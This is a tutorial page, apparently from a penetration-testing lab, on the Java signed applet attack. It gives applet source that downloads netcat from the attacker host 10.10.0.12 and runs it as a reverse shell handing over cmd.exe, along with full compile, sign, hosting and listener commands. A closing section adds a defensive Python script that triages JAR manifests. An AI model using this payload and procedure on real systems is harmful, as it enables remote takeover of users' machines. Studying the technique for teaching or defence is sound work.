Java Signed Applet Attack
The Java Signed Applet Attack is a client-side attack that relies on a human weakness rather than a software vulnerability: the applet does not break out of the browser sandbox, it asks the user to grant it full trust, and many users click "Run" on the warning dialog.
The attack affects targets that have Java installed and enabled in their browsers. In this example we build a malicious signed Java applet that executes code of our choice.
If the user accepts the prompt and runs the applet, the Java runtime installed on the victim's machine executes our payload with the user's privileges.
The Java code below downloads a given executable into the system temp directory and executes it from there on the target machine.
Java.java
    import java.applet.Applet;
    import java.io.BufferedInputStream;
    import java.io.BufferedOutputStream;
    import java.io.File;
    import java.io.FileOutputStream;
    import java.io.IOException;
    import java.io.InputStream;
    import java.io.OutputStream;
    import java.net.URL;

    /**
     * Signed applet payload: downloads the executable named in applet
     * parameter "1" into the temp directory and runs it as a netcat-style
     * reverse shell back to the attacker.
     */
    public class Java extends Applet {

        public void init() {
            try {
                // Drop the download in the user's temp directory (writable without admin rights).
                String tmpdir = System.getProperty("java.io.tmpdir") + File.separator;
                String expath = tmpdir + "evil2.exe";

                // The download URL comes from <param name="1" value="..."> in the applet tag.
                // getParameter returns null when the param is missing, so guard against it.
                String download = getParameter("1");
                if (download != null && !download.isEmpty()) {
                    URL url = new URL(download);
                    InputStream in = new BufferedInputStream(url.openStream());
                    OutputStream out = new BufferedOutputStream(new FileOutputStream(new File(expath)));

                    // Copy the remote file to disk in 2 KiB chunks until EOF (read returns -1).
                    byte[] buffer = new byte[2048];
                    int nBytes;
                    while ((nBytes = in.read(buffer)) != -1) {
                        out.write(buffer, 0, nBytes);
                    }
                    out.flush();
                    out.close();
                    in.close();

                    // Launch the dropped binary with netcat arguments: connect back to
                    // 10.10.0.12 on port 1337 and hand the attacker a cmd.exe.
                    Runtime.getRuntime().exec("cmd.exe /c " + expath + " 10.10.0.12 1337 -e cmd.exe");
                }
            } catch (IOException e) {
                e.printStackTrace();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
Compile the code with the Java compiler, then package and sign the applet:

    /usr/lib/jvm/java-8-openjdk-i386/bin/javac -source 1.7 -target 1.7 Java.java

The manifest must carry the Permissions attribute, so it has to be passed to jar with the m option (jar cvf alone would ignore manifest.txt and the plugin would refuse to run the signed applet). keytool prompts for the certificate's distinguished name; the result is a self-signed certificate, which is what the user is warned about later.

    echo "Permissions: all-permissions" > /root/manifest.txt
    /usr/lib/jvm/java-8-openjdk-i386/bin/jar cvfm Java.jar /root/manifest.txt Java.class
    /usr/lib/jvm/java-8-openjdk-i386/bin/keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123
    /usr/lib/jvm/java-8-openjdk-i386/bin/jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet
    cp Java.class SignedJava.jar /var/www/html/
When the applet is ready, embed it in an HTML file and write it to the web root folder. The applet reads its download URL from parameter "1", so the param tag is required; 10.10.0.12 is the attacker host hard-coded in the applet's reverse-shell command:

    echo '<applet id="Java Secure" archive="SignedJava.jar" code="Java.class" width="1" height="1"><param name="1" value="http://10.10.0.12/evil.exe"></applet>' > /var/www/html/java.html
Copy netcat to the web root and rename it to evil.exe:

    cp /usr/share/windows-binaries/nc.exe /var/www/html/evil.exe
The user browses to java.html and receives a security warning popup; if they ignore it and click "Run", the applet downloads evil.exe and launches it. Note that on Java 7u51 and later the default "High" security level blocks self-signed applets outright unless the hosting site is on the Java Exception Site List, so the "Run" prompt only appears on older or loosened client configurations, and the browser plugin needed to run applets at all was dropped in Java 11 and by current browsers.
The attacker captures the reverse shell with a netcat listener started before the victim visits the page: nc -lnvp 1337
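From the defender's side, the artifact this procedure leaves behind is a signed JAR whose manifest asks for all-permissions. The following is an added example, not part of the original page: a small Python triage script that opens a JAR, parses META-INF/MANIFEST.MF (including the spec's 72-byte continuation lines), detects jarsigner's .SF plus .RSA/.DSA/.EC signature files, reports the Permissions and Codebase attributes, and lists class files that were added after signing and so are not covered by any digest. The sample JAR it inspects is constructed in memory with placeholder bytes in place of a real signature; the signer file name SIGNAPPL follows jarsigner's habit of upper-casing the first eight characters of the alias, and the manifest values are made up for the example.

```python
"""Triage a JAR the way a responder would look at SignedJava.jar from this page.
Added example: is it signed, what Permissions/Codebase does its manifest declare,
and are there entries the signature never covered?"""
import io
import zipfile

MANIFEST_PATH = "META-INF/MANIFEST.MF"
SIG_BLOCK_EXTS = (".RSA", ".DSA", ".EC")

# Constructed sample manifest, shaped like one produced by the build steps above
# (values made up for the example; the digest is not a real hash).
SAMPLE_MANIFEST = (
    "Manifest-Version: 1.0\r\n"
    "Created-By: 1.8.0_222 (Private Build)\r\n"
    "Permissions: all-permissions\r\n"
    "Application-Name: Java Secure\r\n"
    "\r\n"
    "Name: Java.class\r\n"
    "SHA-256-Digest: bm90LWEtcmVhbC1kaWdlc3QtanVzdC1hbi1leGFtcGxl\r\n"
    "\r\n"
)


def parse_manifest(text):
    """Return (main_attributes, {entry_name: attributes}) from MANIFEST.MF text.

    Per the JAR spec: lines end in CRLF or LF, a line starting with a single
    space continues the previous value, and a blank line ends a section.
    """
    sections, current, last_key = [], {}, None
    for raw in text.splitlines():
        if raw == "":
            if current:
                sections.append(current)
                current, last_key = {}, None
            continue
        if raw.startswith(" ") and last_key is not None:
            current[last_key] += raw[1:]  # continuation of a value split at 72 bytes
            continue
        key, sep, value = raw.partition(":")
        if not sep:
            raise ValueError("malformed manifest line: %r" % raw)
        last_key = key.strip()
        current[last_key] = value.strip()
    if current:
        sections.append(current)
    if not sections:
        return {}, {}
    entries = {s["Name"]: s for s in sections[1:] if "Name" in s}
    return sections[0], entries


def triage_jar(jar_bytes):
    """Summarise the security-relevant facts about a JAR given as bytes."""
    report = {"signed": False, "signers": [], "permissions": None,
              "codebase": None, "uncovered_entries": [], "flags": []}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = zf.namelist()
        text = zf.read(MANIFEST_PATH).decode("utf-8") if MANIFEST_PATH in names else ""
        main, entries = parse_manifest(text)

        # jarsigner writes META-INF/<ALIAS>.SF and a matching signature block file.
        upper = {n.upper() for n in names}
        for sf in (n for n in names if n.startswith("META-INF/") and n.upper().endswith(".SF")):
            stem = sf[:-3].upper()
            if any(stem + ext in upper for ext in SIG_BLOCK_EXTS):
                report["signers"].append(sf.split("/")[-1][:-3])
        report["signed"] = bool(report["signers"])
        report["permissions"] = main.get("Permissions")
        report["codebase"] = main.get("Codebase")

        # Every non-META-INF file should have a digest section in the manifest;
        # anything else was dropped in after signing and is not covered by it.
        payload = [n for n in names if not n.startswith("META-INF/") and not n.endswith("/")]
        report["uncovered_entries"] = [n for n in payload if n not in entries]

        if report["signed"] and report["permissions"] == "all-permissions":
            report["flags"].append("signed code requesting all-permissions: full access if the user clicks Run")
        if report["signed"] and report["permissions"] is None:
            report["flags"].append("signed JAR without a Permissions attribute: modern plugins refuse to run it")
        if report["codebase"] in (None, "*"):
            report["flags"].append("no Codebase restriction: the signed JAR can be re-hosted from any site")
        if report["uncovered_entries"]:
            report["flags"].append("entries not covered by the signature: " + ", ".join(report["uncovered_entries"]))
    return report


def build_sample_jar(manifest_text, extra_names=()):
    """Construct an in-memory JAR for the example. The .SF/.RSA contents are
    placeholders, not real signatures; only their presence is inspected."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(MANIFEST_PATH, manifest_text)
        zf.writestr("META-INF/SIGNAPPL.SF", manifest_text)
        zf.writestr("META-INF/SIGNAPPL.RSA", b"\x30\x82placeholder")
        zf.writestr("Java.class", b"\xca\xfe\xba\xbeplaceholder")
        for name in extra_names:
            zf.writestr(name, b"placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for key, value in triage_jar(build_sample_jar(SAMPLE_MANIFEST, ["Dropper.class"])).items():
        print("%-18s %s" % (key + ":", value))
```

The script only checks structure; verifying that the signature blocks actually validate, and whether the signing certificate is self-signed or chains to a trusted CA, is what `jarsigner -verify -verbose -certs SignedJava.jar` is for and is the next step in a real triage.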